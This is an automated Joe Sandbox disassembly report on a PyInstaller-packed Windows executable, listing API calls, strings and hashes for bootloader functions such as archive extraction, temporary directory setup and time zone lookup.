                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B844: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6ABA5B823,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5B84D
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B844: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6ABA5B823,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5B872
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA66EA4
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6687C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6711A
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6712B
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6713C
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6ABA6737C), ref: 00007FF6ABA67163
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                        • Opcode ID: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                        • Instruction ID: 0dca73062300af1a315cc2a6156c63d19862a5a5ab79575d2ae13472c4d92a46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27D1C1A6E1A64286EB24DF29D8611B96762FF4C794F404136EF0DC7AA6FE3CE441C740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                        • Instruction ID: cb1d75f1ef406c19759e57f71fd739c67fefa11134a5efb2c9940b2e8a1323dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78C1C173B2AA4285EB10CF69D4906BC3762F74DBA8B010225DF2E977A5EF38D555C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087

Control-flow Graph (function 7ff6aba670ec; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6711A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6687C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6712B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6681C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6713C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6684C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6ABA6737C), ref: 00007FF6ABA67163
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1010374628-0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$hide-early$hide-late$minimize-early$minimize-late$pkg$pyi-contents-directory$pyi-hide-console$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                                        • API String ID: 2776309574-3325264605
                                                                                                                                                                                                                                                        • Opcode ID: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                        • Instruction ID: 141e423a49e5a16d6529f02195e0f9d4b7848468d1802a4afc2d3722792c4930
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a934bdd3807bdc1780f6dc89ab613ad8fd0c06ef33938902dbcf83096bcc19a5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F428D61A1E68291FB25EB25E4152F96691EF5C784F844132DB9EC22F6FF2CF549C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA473D0: _fread_nolock.LIBCMT ref: 00007FF6ABA4747A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6ABA419FB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42020: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6ABA41B4A), ref: 00007FF6ABA42070
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                        • Instruction ID: c99e08ed026b7ecc37721b5acf7883f0d2bc68bd456e0475c984ad8e7455938e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77b5bceb95b2de1e1f0885317eeacdcfaf3677dc8f04d310bb9146bf4f5e1f65
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C819371A0EA8285EB50DB25D4507BA27A1FF4C784F444036DB8DC77A6FE7CE5859B00

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                        • Instruction ID: fab6401febe304b7408b6a923833a3b96d8ee2e7eebae92c690a655ace13e2fd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293de209e359a31f03b73217838b01d94e9e1d4a78e3dadeeef6acb4d91c5efd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751AE61B0AA4392EA10AB15A4102BA6791FF8C794F844132EF4C87BB6FE3CE555D740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(FFFFFFFF,00000000,?,00007FF6ABA43101), ref: 00007FF6ABA47D44
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00007FF6ABA43101), ref: 00007FF6ABA47D4A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00007FF6ABA43101), ref: 00007FF6ABA47D8C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47E70: GetEnvironmentVariableW.KERNEL32(00007FF6ABA42C4F), ref: 00007FF6ABA47EA7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47E70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6ABA47EC9
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA59174: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA5918D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
• Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandPathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 365913792-1339014028
                                                                                                                                                                                                                                                        • Opcode ID: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                        • Instruction ID: c6ebce326b66ee6c4dc548f9d79dd2f3de40793b4bec4d191f10a24fed5c88ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93349d7b9616cd7418fb1fb7d836f55c0d98c0562c0ac1a5b6313c198f173f9d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7841A121B1BA8240FA64EB2599652F92251EF8D7C0F505631EF0DC77B7FE3DEA458600

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                        • Instruction ID: 9a62833b4a29604724abb5bfac144f7bf6ceadc91254d599189c1ecbeea746a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54511272A0AA8285EA609B25A4503BA6691FF8C794F444231EF4DC7BE6FF3CE541D700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6ABA60316,?,?,-00000018,00007FF6ABA5BC5B,?,?,?,00007FF6ABA5BB52,?,?,?,00007FF6ABA56EFE), ref: 00007FF6ABA600F8
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6ABA60316,?,?,-00000018,00007FF6ABA5BC5B,?,?,?,00007FF6ABA5BB52,?,?,?,00007FF6ABA56EFE), ref: 00007FF6ABA60104
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                        • Instruction ID: 3119eca4d2b70685eb63c9ea4f64a3ed870cf4c5d8f30c91ef9ee8e192b8671d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0141C5A1F1BA4261EA25CB1AA8706752291FF4DB90F064135DF0DD77A8FE7DE4858304

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6ABA42BC5), ref: 00007FF6ABA42AA1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA42BC5), ref: 00007FF6ABA42AAB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42310: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA42360
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42310: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA4241A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentErrorFileFormatLastMessageModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 4002088556-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                        • Instruction ID: d89437a768d7457747843ad2740a0e1d72af9f229b337e637b4baf400d6cb17c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6221A461F2E64291FA20AB24E8113BA6251FF5C784F804236EB5EC65F5FF6CE505C704

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                        • Instruction ID: 40750d42342ff36adedaaf1dd71452c035305665af47b3f000c726543472166d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0C1F57390EB8291E7618B1594402BD7B90FB89B80F550331DB4E837B9FE7DEA458708

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0


                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetCurrentProcess.KERNEL32 ref: 00007FF6ABA47BD0
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: OpenProcessToken.ADVAPI32 ref: 00007FF6ABA47BE3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetTokenInformation.KERNELBASE ref: 00007FF6ABA47C08
